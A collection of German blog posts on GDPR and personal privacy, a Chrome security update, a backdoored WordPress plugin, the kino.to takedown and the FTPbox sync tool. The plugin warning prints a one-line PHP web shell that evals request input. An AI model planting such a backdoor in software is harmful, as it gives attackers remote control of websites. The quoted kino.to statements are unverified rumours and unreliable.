Datenschutz – was geht mich das an?

Wir schreiben den 24.5.2018 –
genau ein Tag vor der digitalen Apokalypse!

Der Todesstern DSGVO hat Europa fast erreicht.

Die Zerstörung der digitalen Welt steht kurz bevor.

 

So könnte man denken, wenn man die Medien in den letzten Wochen verfolgt hat, aber keine Angst – so schlimm wird es nicht werden.

Die meisten der Regelungen gab es auch bisher im Bundesdatenschutzgesetz (BDSG).
Die Datenschutzgrundverordnung (DSGVO) regelt auf europäischer Ebene den Umgang mit personenbezogenen Daten, ist bereits seit 2016 gültig und wird zum 25.5.2018 anwendbar – ebenso wie das BDSG (neu).

Zur DSGVO will ich gar nicht mehr viel schreiben, wir haben in den letzten Monaten schon viel zu lesen bekommen, viel Richtiges, viel Falsches, viel Halbgares.
Endgültige Klarheit wird es in vielen Punkten erst geben, wenn die ersten Urteile vorliegen.

Worum es mir hier geht, ist das Thema Datenschutz im privaten Umfeld – der Umgang mit Daten im geschäftlichen Umfeld sollte bereits jedem bekannt sein.

Wieso überhaupt und warum ist das wichtig? Was habe ich damit zu tun?

Wir leben in einer digitalen Welt, wir kaufen online ein, surfen im Internet, nutzen Facebook und WhatsApp, kommunizieren und telefonieren kabellos.

Wir sind ‚Allways On‘

Unsere Kühlschränke kaufen selbstständig fehlendes Gemüse, per Knopfdruck erhalten wir neues Waschmittel.
Unsere Smartphones kennen uns besser als wir uns selbst, wissen wieviel und wohin wir uns bewegt haben, wo unsere Autos geparkt sind und welchen Puls wir heute Nacht um 3:21 Uhr hatten.

Die meisten dieser Informationen sind für uns hilfreich, erleichtern den Tag, erinnern uns an Dinge die wir sonst vergessen würden und geben uns auch Zeit.
Das ist der Grund warum wir diese Helfer nutzen und dankend annehmen, besonders, wenn und weil uns diese Leistungen vermeintlich nichts kosten.

Und jetzt kommt das ‚Aber‘ – alle diese Gadgets, Helfer und Apps benötigen unsere Daten um arbeiten zu können.
Dabei fallen unendliche viele Daten über uns und unsere Angewohnheiten an, vielfach auch Daten von Dritten (Kindern, Freunden, Kontakten).
Diese Daten lassen sich auf Personen beziehen, Personen zuordnen und Algorithmen nutzen die Daten um viel mehr über uns und andere heraus zu finden als uns lieb sein sollte.

Der Sinn einer DSGVO oder BDSG ist, den Umgang mit diesen Daten zu regeln, festzulegen, wie solche Daten erhoben, verarbeitet und genutzt werden dürfen.
Dieses dient dem Schutz der Dateninhaber – das sind wir alle – vor Missbrauch!

Daher sollten wir dankbar für die DSGVO sein.

Warum ist das nötig?

Die Anbieter der genannten Helferlein (Plattformen, Apps) sind – in der Regel – keine Wohltätigkeitsvereine.
Es sind Aktiengesellschaften, Kapitalgesellschaften und auch die ein oder andere zwielichtige Gestalt ist dabei.
Diese Anbieter müssen Gewinne erwirtschaften, müssen von etwas leben, sollen und wollen ihren Aktionären zu Reichtum verhelfen.

Wie kann das funktionieren, wenn eine solche Leistung kostenfrei angeboten wird?

Wir alle bezahlen diese Leistungen mit unseren Daten, mit unserer digitalen Identität, mit unseren Bewegungsprofilen und Interessen.
Wir erhalten auf uns angepasste Werbung (was im Grund vielleicht sogar besser ist, als Werbung die uns gar nicht interessiert), wir erhalten Tipps zu einem naheliegenden Restaurant, für einen Film der uns interessieren könnte oder ein Buch (ja, offenbar liest noch jemand Bücher..)

Wenn wir solche Daten freiwillig und wissentlich für einen spezifischen Zweck zur Verfügung stellen – dann haben wir uns das so ausgesucht und dann ist die Erfassung, Verarbeitung und Nutzung dieser Daten auch völlig in Ordnung, selbst aus Sicht der DSGVO.

Werden solche Daten OHNE unser Wissen erhoben und genutzt – dann ist das eben nicht in Ordnung.
War es im Übrigen auch vor der DSGVO nicht, aber die Sanktionen hielten sich hier auf Portokassen Niveau, wenn überhaupt.

Oftmals wurden daher die Datenschutzbestimmungen durch Unternehmen nach dem Motto  ‚das Kosta fast gar nix‘ ignoriert.
Nun sieht das etwas anders aus, es hängen deutlich höhere Bußgelder zu deutlich mehr sanktionsfähigen Punkten um Raum.

Es geht ums Geld – und damit kam auch die Panik.

Wie betrifft das mich?

Datenschutz betrifft uns alle, wir müssen uns Gedanken machen, welche Daten wir von uns preisgeben und preisgeben wollen, wessen Daten wir überhaupt freigeben, an wen und warum!

Wir gehen viel zu Gedankenlos mit personenbezogenen oder personenbeziehbaren Daten um.
Wir posten auf Social Media Plattformen, wie schön unser Urlaub gerade ist

  • eine Einladung für jeden Einbrecher

Wir posten Fotos von unseren Kindern und Enkeln oder anderen Personen

  • haben wir jemals nach dem Einverständnis der betroffenen Person gefragt?
    Vielleicht möchte unser Kind nicht im Internet gezeigt werden. Auch und besonders Kinder haben ein Recht auf digitale Selbstbestimmung

Wir posten unser Essen, unsere Einstellung, unsere Meinung, unseren neuen Pullover und unser neues Auto

  • Unser Essen hat zumindest kein Recht auf Selbstbestimmung, schon mal ein Anfang.
    Aber was macht eine Plattform oder App aus diesen Daten und wollen wir wirklich daraufhin Werbung von einem anderen Pullover Fabrikanten oder einer anderen Autoversicherung erhalten?

Wir lassen uns tracken, überwachen und ausspionieren.

  • Wir surfen nicht anonym, wir nehmen jeden Cookie an, wir gestatten die Nutzung von allerlei Überwachungsmöglichkeiten

Wir denken, dass Verschlüsselung von Daten für uns kein Thema ist.

  • Wir übertragen Daten über ungesicherte Leitungen, speichern Kennwörter im Klartext, speichern Daten unverschlüsselt auf Datenträgern oder in der Cloud

Wir packen unsere Daten in die Cloud, oftmals ohne Kenntnis der technischen Möglichkeiten oder Einschränkungen des jeweiligen Anbieters oder Dienstes

  • End–to–End Verschlüsselung klingt für uns nach Krankheit statt nach Medizin, Hauptsache ‚alles ist sicher online‘

Bei all unseren digitalen Ausflügen und Unternehmungen fallen so permanent Daten an.

Das Ermittlungsbehörden und die böse NSA es schaffen mit diesen gigantischen Datenmengen umzugehen, ist seit Snowden kein Geheimnis mehr.

Es ist Heutzutage aber auch für Kapitalunternehmen technisch und wirtschaftlich KEIN Problem mehr mit den Datenbergen fertig zu werden.
Im Gegenteil, es ist das tägliche Geschäft der Datenkraken eben genau solche Leistungen zu stemmen und mit dem Ergebnis Gewinne zu erwirtschaften.

Hier mal ein Beispiel, was der Facebook Algorithmus aus den Daten zieht und wie er über meine Einkaufsgewohnheiten denkt:

Da muss ich sagen, das ist schon verdammt gut.

Und das, obwohl ich persönlich kaum Informationen über gekaufte Produkte teile.
Diese Daten errechnen sich ausschließlich über mein allgemeines Nutzerverhalten auf Facebook!

Und dank des Algorithmus weiß ich jetzt auch, wie es um meine Gesundheit bestellt ist

5 von 5 – auch hier liegt das Ding verdammt richtig, ja, ich sollte es dem Algorithmus zeigen und Mitglied in einem Sportverein werden.

Was kann ich tun?

Wir können alle eine Menge dafür tun, Daten vor Missbrauch zu schützen.
Unserer Daten und besonders die Daten von Dritten.

Mit unseren eigenen Daten dürfen wir im Rahmen unserer Selbstbestimmung tun und lassen was wir möchten, sinnvoll wäre es, wenn wir uns hier dennoch Gedanken machen würden.

Mit den Daten von Dritten dürfen wir nur das tun, was der Dritte uns zugestanden hat, hier gilt der Datenschutz im Sinne der DSGVO oder BDSG auch für jeden von uns.

Ein paar Tipps die wir alle berücksichtigen können:

  • Erfassen, teilen und posten Sie keine Daten / Fotos für die Sie keine Freigaben haben
  • Posten Sie besonders keine Fotos von Ihren Kindern im Internet
  • Seien Sie sparsam mit Informationen über sich und Ihre Gewohnheiten
  • Beschränken Sie die ‚Sichtbarkeit‘ Ihrer Informationen auf den jeweiligen Plattformen
  • Posten Sie Urlaubsbilder nach Ihrem Urlaub
  • Verabschieden Sie sich von dem Gedanken, dass Sie kostenlose Leistungen erhalten
  • Teilen Sie nicht gedankenlos!
  • Seien Sie Skeptisch – schärfen Sie Ihr Bewusstsein – hinterfragen Sie den Sinn von gewissen Dingen, Posts und Aussagen. Nicht jede Meldung ist korrekt
  • Seien Sie geizig mit Ihren Daten, so geizig wie es geht
  • Geben Sie mal bewusst Ihre Payback Karte nicht an der Kasse ab, verzichten Sie auf die 1%
  • Verabschieden Sie sich von dem Gedanken, dass Sie kostenlose Leistungen erhalten
  • Hinterfragen Sie den Grund einer Datenerfassung, auch wenn Sie diese selbst durchführen
  • ‚Hinterlassen Sie diesen Ort bitte so, wie Sie in vorfinden wollen‘ – Machen Sie sich Gedanken  um die Ihre und die Daten Dritter, privat wie beruflich
  • Lesen Sie einfach mal die DS Erklärungen der ein oder anderen App, und stellen Sie die Nutzung einer App ggf. auch ein. Selbst, wenn es sich um WhatsApp handelt. Schauen Sie nach Alternativen – je mehr Nutzer das tun, desto höher auch der Druck auf den Anbieter sein Datenschutzverhalten zu überdenken.
  • Verabschieden Sie sich von dem Gedanken, dass Sie kostenlose Leistungen erhalten
  • Lernen Sie Ihre Rechte kennen und setzen diese auch durch! Recht auf Auskunft, Berichtigung, Löschung, Einschränkung. Recht auf Vergessen werden!

Wenn wir alle die Wichtigkeit dieser – unserer – Daten erkennen und berücksichtigen, dann werden wir an Sicherheit, Privatsphäre und Selbstbestimmung gewinnen.

Unserer Digitale Identität ist das Hab und Gut des 21. Jahrhunderts, schützen wir dieses so gut wie wir unser Analoges Gut schützen!
Schließen wir ab, lassen nur berechtigte Personen an unseren Daten teilhaben. So schützen wir uns vor Diskriminierung, Datenmissbrauch und Überwachung.

Daten die durch unser Verhalten geschützt, nicht vorhanden oder nicht zugänglich sind KÖNNEN nicht missbraucht werden!

Damit bekämpfen wir die dunkle Seite der Macht!

Hinweis: alle diese Hinweise uns Einschätzungen sind meine persönliche Meinung, diese kann weder in allen Punkten korrekt noch umfassend sein. Wenn Sie belastbare Informationen benötigen, dann wenden Sie sich bitte an einen Anwalt, Datenschützer oder an Mutti.

Weiterlesen

Chrome Upate 44.0.2403.89 fixt mehrere schwere Sicherheitslücken

Gerade erschienen ist ein Update für den beliebten Internet Browser Google Chrome (also zumindest bei mir ist der recht beliebt, habe gehört, dass es Kritiker geben soll :) )

Das Update auf Version 44.0.2403.89 schließt mehrere Sicherheitslücken (Siehe Changelog), welche es Angreifern, unter anderem, ermöglich(t)en beliebige Befehle auf dem Zielsystem auszuführen, Dateien zu manipulieren und Sicherheitsvorkehrungen zu umgehen – nicht gut für deinen Rechner!

Ich rate jedem dringend das automatische Update in Chrome zu nutzen um auf die aktuelle Version zu kommen.

Dafür erhaltet ihr auch ein neues animiertes Update Symbol :)

Weiterlesen

wp-phpmyadmin Plug-In – Jetzt löschen!

Nutzt du das WordPress Plug-In WP-phpmyadmin? Dann solltest du es jetzt laut den Sucuri Experten sofort löschen. Die Security Experten haben verschiedenen Seiten gesehen welche durch die Nutzung von wp-phpmyadmin gehackt wurden.
Der Angriff hat durch eine Backdoor statt gefunden, der folgende Code befand sich in der upgrade.php Datei:

<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>

Dieser Teil ist laut Sucuri nicht Bestandteil des Plug-Ins und erlaubt den Remote Zugriff auf die WordPress Installation.

Das Plug-In soll Zugriff auf phpMyAdmin direkt aus WordPress heraus geben, ist aber schon seit einigen Jahren nicht mehr upgedatet worden. Bitte prüfen ob ihr das Plug nutzt und wenn ja ggf. entfernen!

Sucuri

Weiterlesen

Kino.to ist offline genommen worden

Vor knapp einer Woche habe ich zum Ersten Mal etwas von kino.to wahrgenommen – Thomas Schwenke schrieb dazu auf spreerecht.de einen Artikel.

Auf kino.to konnte man anscheinend Streams von aktuellen (Kino) Filmen und Serien ansehen. Legal oder Illegal kann ich nicht bewerten, schaut euch den Artikel bei spreerecht.de an und bildet eure eigene Meinung.

Bei Caschy habe ich dann soeben gelesen dass die Seite offline ist – scheinbar hat die Kripo zugeschlagen und den/die Betreiber fest genommen. Auf kino.to findet man nur noch folgenden Hinweis:

thingybob-kino-to-kripo

Dieser sieht allerdings doch reichlich merkwürdig aus, ich möchte auch bezweifeln, dass die Kripo einen solchen Text hinterlässt – die Aussagen passen irgendwie nicht so recht, eine kleine Analyse dazu findet ihr bei smBlogger.de

Das alles sieht ziemlich nach Fake aus – auch wenn mir kein rechter Grund einfallen würde warum man das faken sollte wenn man mit der Seite Millionen verdient (hat).

Allerding schreibt auch Spiegel Online über den Vorgang:

Es ist ein Großschlag gegen Urheberrechtsverletzer: Die Staatsanwaltschaft Dresden ermittelt gegen die Streaming-Seite kino.to. Bei Razzien in mehreren europäischen Ländern wurden 13 Personen verhaftet. Ihnen wird die Bildung einer kriminellen Vereinigung vorgeworfen.

Deren Informationen stammen wohl von der GVU, zumindest sind einige Passagen fast wortgleich übernommen worden. Die GVU Seite ist derzeit etwas schwer erreichbar, aber den Inhalt der Pressemitteilung kann man wie gesagt quasi bei Spiegel Online nachlesen.

Mit kino.to sind auch noch einige andere Domains verschwunden welche scheinbar mit dem Streaming in Verbindung standen.

Mal sehen ob die merkwürdige Mitteilung auf kino.to so stehen bleibt oder ob sich jemand anderes als die Kripo zu dem Text ‘bekennt’.

Update 1:

Hier gibt es Teile des angeblichen Durchsuchungsbeschlusses zu sehen (Echt oder nicht, ich weiß es nicht)

http://bit.ly/lwjEPv
http://bit.ly/lOHreS

Update 2:

Jetzt ist die dubiose Mitteilung auf kino.to nicht mehr zu sehen, statt dessen kommt eine freundliche ‘502 Bad Gateway’ Mitteilung von nginx.

Überlastet sollte die Seite eigentlich nicht sein, aber man weiß ja nie.

Was mir – wenn ich so drüber nachdenke – noch komisch vorkommt ist die Tatsache, dass man doch die Server beschlagnahmt hat – hat die Kripo da einen Server mitgebracht um eine Meldung zu präsentieren?

Update 3:

Folgendes geistert derzeit durch das Netz, Fake oder Wahr – wer weiß das schon:

Lieber Nutzerinnen und Nutzer,

Wie ihr wahrscheinlich mitbekommen habt wurden welche von uns gebustet . Es kam auch bei mir zu einer HD und ich bin gerade in einem Internet Café Eure visits bzw eure IP wurde NICHT gespeichert alles was verbreitet wird oder wurde ist gelogen . Es wurden zwar Server beschlagnahmt , diese waren aber mit Truecrypt verschlüsselt , Ich war nicht in Untersuchungshaft bzw noch nicht es wurden auch meine HDD’s und Computer mitgenommen und mit extra anzeigen weil sie andere dinge gefunden haben. Diese Überwachungsaktionen wurden nicht im Rahmen des Gesetzes unternommen unter anderem wurden Telefone abgehört , Leute beschattet nur wegen der “Vermutung”
Ich denke ich habe noch mal Glück gehabt da mein Rechner auch gecryptet war. Die gerüchte sind war das Kino.to Kontakt zu Speedtest , dies sollte nur klar gestellt werden aber Speedtest hat nichts verbrochen . Gelder sind vorhanden , Kino.to kommt bald wieder aber wahrscheinlich unter neuer Leitung . Zur Info, der Hoster hat uns nicht sitzengelassen sondern einer der Team Mitglieder hat sich verplappert und wurde erpresst . Nein wir haben nie etwas mit Kinderpornographie am Hut gehabt . Und nein killu ist nicht der Boss oder hat damit etwas zu tun .
Zudem wird unser Rechtsbeistand gegen klagen wegen ungesetzlicher Beschattung auf Grund von Vermutungen ohne Beweisen . Ich wiederhole es besteht keine Gefahr für euch.

Update 4:

Und noch ein Text eines ‘uppers’ (ich bin echt zu alt für diesen hacker slang.) – auch hier gilt, keine Aussage zum Wahrheitsgehalt:

So nun kann ich auch mal klartext reden zu dem Vorfall….
Die Betreiber wussten seit letzter Woche Freitag es nur noch eine Frage der Zeit ist bis es zu unzähligen Hausbesuchen kommt. (Ich war dort upper und habe meine Streams zur verfügung gestellt). Deswegen wurde von allen was der Betreiber (Namen möchte ich nicht nennen) voll kopiert und auf einen dritt Man übermittelt der Die Seite, falls es zu einem bust kommt, wieder aufbauen soll.
Diese komplettes Backup mit der kompletten DB und allen Logs exisitiert noch!
Die kommenden Tage wird es eine Spiegel Seite geben und die ganzen Hoster werden unter anderen Namen und vorkehrungen wieder aufgebaut. Ein Projekt steht kurz vor der Eröffnung mehr dazu die Tage.
Zu der festnahme: Die Polizei nimmt an das sie alle Hintermänner haben… falsch gedacht. das Team bestand oder besteht noch aus 26 Mitgliedern, 2 davon aus Polen. Das heißt hälfte der Betreiber sind nocha uf freien Fuß.
Diese Betreiber haben ständigen Kontakt zueinander und tauchen erstmal in andere Staaten unter, betreiben aber noch unzählige Sharing Seiten.
Hinter Kino.to steckt einiges mehr also „nur“ eine Stream Seite das solltet ihr bedenken. „7 stelliger Bereich“ ist dabei noch untertrieben. Da wir ein NP Board sind plauder ich noch ein bisschen Weiter…

Wer regelmäßig Kinofilem lädt kennt mit sicherheit „Pleaders“. Das ist eine Filme Rls Groupt und ratet mal wer dahinter steckt.. Genau! es sind 34 Leute in unterschiedlichen Staaten. und all diese 34 Menschen haben für kino.to gearbeitet…

kino.to ist noch lange nicht Geschichte. Auf deren Server werden immer noch Filme ohne ende verteilt hochgeladen und genuked… da ich verlässliche Kontakmänner zu deren Irc habe.
Alle die was anderes behaupten sind schlicht und ergreifend lügner….

MFG Hasbihal alias crystal1

Update 5:

Caschy hat noch ein Bild zur kino.to Struktur gefunden:

thingybob-kino-to-struktur

Spreerecht.de | Caschy | smBlogger.de | Spiegel Online | GVU

Weiterlesen

FTPbox – deine eigene Dropbox

Dropbox kennen die meisten von euch – etliche nutzen die Software auch um Ihre Daten zwischen verschiedenen Clients und Computern zu synchronisieren. Deine Daten liegen in der Cloud – was ja schick ist, aber bei einigen auch Kopfschmerzen und Sicherheitsbedenken auslöst.

Mit FTPbox gibt es jetzt ein neues Tool (derzeit in Beta) was es ermöglicht eine Dropbox ähnliche Funktionalität per FTP zu realisieren.
Dazu braucht man zum einen einen FTP Server und zum anderen die FTPbox Software. Diese ist eine kleine Exe Datei welche man auf seinem PC ausführt.

thingybob-ftpbox-1

Im ersten Schritt muss man einen FTP Account definieren, dazu gibt man die Login Daten für den FTP Server entsprechend ein.

thingybob-ftpbox-2

Danach wählt man auf dem Server ein Verzeichnis aus welches die zu synchronisierenden Daten erhalten soll. Außerdem noch einen lokalen Ordner in den man dann die Daten reinspeichert welche man gerne synchronisieren möchte.

Das war schon die komplette Installation und die Files im Lokalen Ordner werden ab sofort mit dem FTP Server abgeglichen. Natürlich muss man die Software noch auf den anderen Clients installieren mit denen man Daten synchronisieren möchte.

FTPbox ist derzeit noch in Beta, funktioniert in meinem Test aber Einwandfrei, man sollte darauf achten, dass man auf dem FTP Server vor der Installation einen eigenen Ordner anlegt, und diesen dann für FTPbox auswählt, damit es kein Durcheinander gibt.

In der Beta unterstützt die FTPbox nur FTP – als nächstes Feature soll dann auhc SFTP unterstützt werden was natürlich schick wäre.

Fazit: Wenn man einen eigenen FTP Server besitzt, dann sollte man das Tool auf jeden Fall im Auge behalten. Als ‘private’ Alternative zu Dropbox scheint FTPbox sehr geeignet zu sein.

Dropbox | FTPbox | Direkter Download

Weiterlesen
Menü schließen